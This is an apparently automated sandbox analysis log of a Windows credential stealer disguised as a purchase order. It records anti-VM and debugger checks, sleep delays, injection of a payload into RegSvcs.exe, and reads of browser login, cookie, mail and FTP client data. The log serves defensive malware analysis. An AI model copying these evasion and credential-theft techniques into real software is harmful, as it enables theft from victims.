                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7505Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 2828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe TID: 5356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599757Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598668Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598442Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598311Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597640Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597093Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596874Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596641Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596184Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596077Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595968Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595778Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595653Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595528Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: Amcache.hve.5.drBinary or memory string: VMware
                        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                        Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                        Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                        Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                        Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: RegSvcs.exe, 00000002.00000002.4120558709.0000000005BD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                        Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: PO54782322024.exe, ------------------.csReference to suspicious API methods: GetProcAddress(_05C4_05A2_05F6_0595_05FA_059A_05A3, _05BC_05B4_05F9_05A6_0591_0598_05A2_05F5)
                        Source: PO54782322024.exe, ------------------.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)_05A6_059F_0590_0594_05EB_059A_05F3_05C1.Length, 64u, out var _05CA_0596_05F3_05BA_05FC_05FB_05CD_0598_0591_05AB_05C0_05A4_05FA)
                        Source: PO54782322024.exe, ------------------.csReference to suspicious API methods: LoadLibrary(array5[0])
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000Jump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000Jump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 85C008Jump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: C:\Users\user\Desktop\PO54782322024.exeQueries volume information: C:\Users\user\Desktop\PO54782322024.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f6db50.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f43b08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f6db50.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
